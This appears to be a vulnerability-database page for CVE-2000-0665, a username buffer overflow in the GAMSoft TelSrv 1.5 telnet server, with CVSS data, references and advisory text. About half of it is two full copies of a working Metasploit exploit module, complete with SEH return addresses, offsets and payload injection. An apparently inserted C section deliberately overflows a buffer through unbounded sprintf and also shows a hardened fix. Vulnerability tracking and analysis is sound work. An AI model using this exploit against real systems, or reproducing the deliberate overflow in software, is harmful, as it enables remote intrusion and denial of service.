CVE-2000-0665
CVSS 5.0
Published: 2000-07-17 00:00:00
Revised: 2008-09-05 16:21:35

[Original] GAMSoft TelSrv telnet server 1.5 and earlier allows remote attackers to cause a denial of service via a long username.


[CNNVD] GAMSoft Telsrv DoS vulnerability (CNNVD-200007-040)

        A vulnerability exists in GAMSoft TelSrv telnet server 1.5 and earlier. A remote attacker can cause a denial of service by supplying an overly long username.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:gamsoft:telsrv:1.4
cpe:/a:gamsoft:telsrv:1.5

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0665
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0665
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-040
(official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0031.html
(VENDOR_ADVISORY)  NTBUGTRAQ  20000717 DoS in Gamsoft TelSrv telnet server for MS Windows 95/98/NT/2k.
http://xforce.iss.net/static/4945.php
(VENDOR_ADVISORY)  XF  gamsoft-telsrv-dos
http://www.securityfocus.com/bid/1478
(VENDOR_ADVISORY)  BID  1478
http://www.osvdb.org/373
(UNKNOWN)  OSVDB  373
http://archives.neohapsis.com/archives/ntbugtraq/2000-q3/0056.html
(UNKNOWN)  NTBUGTRAQ  20000729 TelSrv Reveals Usernames & Passwords After DoS Attack

- Vulnerability information

GAMSoft Telsrv DoS vulnerability
Medium severity   Boundary condition error
2000-07-17 00:00:00   2005-05-02 00:00:00
Remote ※ Local
        A vulnerability exists in GAMSoft TelSrv telnet server 1.5 and earlier. A remote attacker can cause a denial of service by supplying an overly long username.

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (16816)

GAMSoft TelSrv 1.5 Username Buffer Overflow (EDBID:16816)
Platform: windows   Type: remote
Date: 2010-06-22   Verified
Port: 23   Author: metasploit
##
# $Id: gamsoft_telsrv_username.rb 9583 2010-06-22 19:11:05Z todb $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
			'Description'	=> %q{
					This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.
				Other versions may also be affected. The service terminates after exploitation,
				so you only get one chance!
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'        => '$Revision: 9583 $',
			'References'    =>
				[
					[ 'CVE', '2000-0665'],
					[ 'OSVDB', '373'],
					[ 'BID', '1478'],
					[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
				],
			'Privileged'		=> false,
			'DefaultOptions'	=>
				{
					'EXITFUNC' 	=> 'thread',
				},
			'Payload'        	=>
				{
					'Space'			=> 1000,
					'BadChars' 		=> "\x00\x0a",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
				[
					[ 'Windows 2000 Pro SP0/4 English REMOTE',
						{
							'Ret'		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
							'Offset'	=> 1886,
						}
					],

					[ 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
						{
							'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
							'Offset'	=> 3318,
						}
					],

					[ 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
						{
							'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
							'Offset' 	=> 3358,
						}
					],
=begin
					[ 'Windows XP Pro SP0/1 English',
						{
							'Ret' 		=> 0x71aa32ad, # pop/pop/ret xp pro en ALL
							'Offset'	=> 2600, # this is made up and absolutely wrong ;-)
						}
					],
=end
				],
			'DisclosureDate' => 'Jul 17 2000',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def check
		connect
		print_status("Attempting to determine if target is vulnerable...")
		select(nil,nil,nil,7)
		banner = sock.get_once(-1,3)

		if (banner =~ /TelSrv 1\.5/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
		connect
		print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
		select(nil,nil,nil,7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.

		username = rand_text_english(20000, payload_badchars)
		seh = generate_seh_payload(target.ret)
		username[target['Offset'], seh.length] = seh

		print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
		sock.put(username)
		select(nil,nil,nil,0.25)
		print_status('Exploit sent...')
		handler
		disconnect
	end

end
		

- Vulnerability information (F83042)

GAMSoft TelSrv 1.5 Username Buffer Overflow (PacketStormID:F83042)
2009-11-26 00:00:00
Patrick Webster   metasploit.com
exploit, overflow
CVE-2000-0665

This Metasploit module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5. Other versions may also be affected. The service terminates after exploitation, so you only get one chance!

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
			'Description'	=> %q{
            	This module exploits a username sprintf stack overflow in GAMSoft TelSrv 1.5.
			Other versions may also be affected. The service terminates after exploitation,
			so you only get one chance!
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2000-0665'],
				[ 'OSVDB', '373'],
				[ 'BID', '1478'], 
				[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip'],
			],         
			'Privileged'		=> false, 
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload'        	=>
				{ 
					'Space'			=> 1000,
					'BadChars' 		=> "\x00\x0a",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				[
				'Windows 2000 Pro SP0/4 English REMOTE',
				{
					'Ret'		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
					'Offset'	=> 1886,
				}
				],
				[ 
				'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
				{
					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
					'Offset'	=> 3318,
				}
				],
				[ 
				'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
				{
					'Ret' 		=> 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
					'Offset' 	=> 3358,
				}
				],
			        #[
				#'Windows XP Pro SP0/1 English',
				#{
				#	'Ret' 		=> 0x71aa32ad, # pop/pop/ret xp pro en ALL
				#	'Offset'	=> 2600, # this is made up and absolutely wrong ;-)
				#}
				#],
				#[
			],
			'DisclosureDate' => 'Jul 17 2000', 
			'DefaultTarget' => 0))
            
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def check 
		connect
		print_status("Attempting to determine if target is vulnerable...")
		sleep(7)
		banner = sock.get_once(-1,3)

		if (banner =~ /TelSrv 1\.5/)
			return Exploit::CheckCode::Vulnerable 
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...") 
		connect
		print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
		sleep(7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not. 

		username = rand_text_english(20000, payload_badchars)
		seh = generate_seh_payload(target.ret)
		username[target['Offset'], seh.length] = seh
	
		print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
		sock.put(username)
		sleep(0.25)
		print_status('Exploit sent...') 
		handler
		disconnect
	end

end
    

- Vulnerability information

OSVDB 373
GAMSoft TelSrv Multiple Field Overflow DoS
Remote / Network Access   Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability   Discontinued Product, Solution Unknown
Exploit Public   Uncoordinated Disclosure

- Vulnerability description

A remote overflow exists in GAMSoft's TelSrv. The telnet server fails to bound the length of the username and password fields it receives, resulting in a buffer overflow. With a specially crafted login, an attacker can cause the service to stop responding, resulting in a loss of availability.

- Timeline

2000-07-17 Unknown
2000-07-17 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue. Further, this software is no longer being maintained.

- Vulnerability information

GAMSoft Telsrv DoS Vulnerability
Class: Boundary Condition Error   BID: 1478
Remote: Yes   Local: Yes
Published: 2000-07-17 12:00:00   Updated: 2008-02-01 06:47:00
Discovered by Prizm <Prizm@RESENTMENT.org> on July 17, 2000. Additional information provided by Patrick Webster <webster@PIS.COM.AU> on July 28, 2000.

- Affected product versions

GAMSoft Telsrv 1.5
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
GAMSoft Telsrv 1.4
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- Vulnerability discussion

GAMSoft Telsrv telnet server is prone to a trivial denial-of-service attack. If a malicious user connects to port 23 and supplies a username of approximately 4550 characters, the telnet application crashes. The service must be restarted to regain normal functionality.

In some cases, Telsrv returns an error message that contains a valid username and password in plain text. This can be used to gain unauthorized access to the telnet server.
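As an added illustration, not TelSrv's own code: the Metasploit module above describes the flaw as a username sprintf stack buffer overflow, and the BID entry gives roughly 4550 characters as enough to crash the service. The C below shows that bug class in a minimal login handler beside a hardened version. The buffer size, the username limit and the greeting format are assumptions; the guard word stands in for the saved return address or SEH record that the real overflow reaches (the module's offset of 1886 is TelSrv-specific and is not modelled here).

```c
/* Added example (assumed login handler, not TelSrv code): an unbounded
 * sprintf of an attacker-controlled username into a fixed buffer, beside
 * a hardened version that checks the length before formatting. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GREETING_SIZE 64       /* hypothetical fixed-size buffer */
#define MAX_USERNAME  32       /* hypothetical policy limit on a login name */
#define GUARD_VALUE   0xDEADBEEFu

/* Heap-allocated stand-in for the vulnerable function's stack frame. The
 * guard word sits where a saved return address or SEH record would be; the
 * slack region absorbs the rest of the overflow so the demo does not crash.
 * Writing past greeting[] is still undefined behaviour: illustrative only. */
struct login_frame {
    char greeting[GREETING_SIZE];
    unsigned int guard;
    char slack[8192];
};

/* sprintf taken through a pointer so a fortified compiler wrapper cannot
 * intercept the call and abort before the overflow is observable. */
static int (*const unchecked_sprintf)(char *, const char *, ...) = sprintf;

/* Vulnerable: the username length is never checked. A 4550-byte name, as
 * in the public DoS report, runs far past greeting[] and over the guard. */
static void greet_vulnerable(struct login_frame *f, const char *username)
{
    f->guard = GUARD_VALUE;
    unchecked_sprintf(f->greeting, "Welcome, %s\r\n", username);
}

/* Length of s, scanning at most max bytes (avoids depending on strnlen). */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hardened: refuse over-long names up front, and bound the write anyway.
 * Returns 0 on success, -1 if the name is rejected or would not fit. */
static int greet_hardened(char *out, size_t out_size, const char *username)
{
    if (bounded_len(username, MAX_USERNAME + 1) > MAX_USERNAME)
        return -1;                            /* reject before formatting */
    int written = snprintf(out, out_size, "Welcome, %s\r\n", username);
    if (written < 0 || (size_t)written >= out_size)
        return -1;                            /* truncation is an error, not a success */
    return 0;
}

/* Constructed input: a username of len printable filler bytes. */
static char *make_username(size_t len)
{
    char *u = malloc(len + 1);
    if (!u)
        abort();
    memset(u, 'A', len);
    u[len] = '\0';
    return u;
}

/* Run the vulnerable path with a len-byte name; 1 if the guard was overwritten. */
int vulnerable_guard_clobbered(size_t len)
{
    struct login_frame *f = calloc(1, sizeof *f);
    char *u = make_username(len);
    if (!f)
        abort();
    greet_vulnerable(f, u);
    int clobbered = f->guard != GUARD_VALUE;
    free(u);
    free(f);
    return clobbered;
}

/* Run the hardened path with a len-byte name; returns its status code. */
int hardened_accepts(size_t len)
{
    char out[GREETING_SIZE];
    char *u = make_username(len);
    int rc = greet_hardened(out, sizeof out, u);
    free(u);
    return rc;
}

int main(void)
{
    printf("8-byte name,    vulnerable: guard clobbered = %d\n", vulnerable_guard_clobbered(8));
    printf("4550-byte name, vulnerable: guard clobbered = %d\n", vulnerable_guard_clobbered(4550));
    printf("8-byte name,    hardened:   rc = %d\n", hardened_accepts(8));
    printf("4550-byte name, hardened:   rc = %d\n", hardened_accepts(4550));
    return 0;
}
```

The hardened version makes two separate decisions: a policy check on the input length before any formatting, and a size-bounded write whose truncation is treated as failure rather than silently accepted. Either alone would have stopped the crash; both together also stop the quieter case where a truncated greeting is later parsed as if it were complete.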

- Exploit

The following exploit code is available as a module for the Metasploit Framework:

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

